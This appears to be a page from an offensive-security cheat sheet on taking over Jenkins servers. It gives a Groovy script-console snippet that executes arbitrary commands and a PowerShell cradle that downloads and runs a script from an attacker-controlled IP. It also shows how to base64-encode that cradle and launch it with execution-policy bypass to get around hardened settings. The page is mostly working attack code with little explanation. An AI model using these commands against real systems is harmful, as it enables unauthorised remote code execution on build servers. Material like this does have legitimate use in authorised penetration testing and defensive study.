Jenkins

Go to

http://<IP>/script

on a Jenkins server write

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Without admin access : add a build step in the build configuration, add "Execute Windows Batch Command" and powershell –c

powershell -c "iex (new-object system.net.webclient).downloadstring('http://<attacker_IP>/Invoke-HelloWorld.ps1')"

For more hardened policy

On Kali

echo "iex (new-object system.net.webclient).downloadstring('http://<attacker_IP>/Invoke-HelloWorld.ps1')" | iconv --to-code UTF-16LE | base64 -w 0

In Jenkins

cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <base64_command>

PreviousFeatures NextWindows Server Update Services (WSUS)

Last updated 8 months ago

hashtagFor more hardened policy

For more hardened policy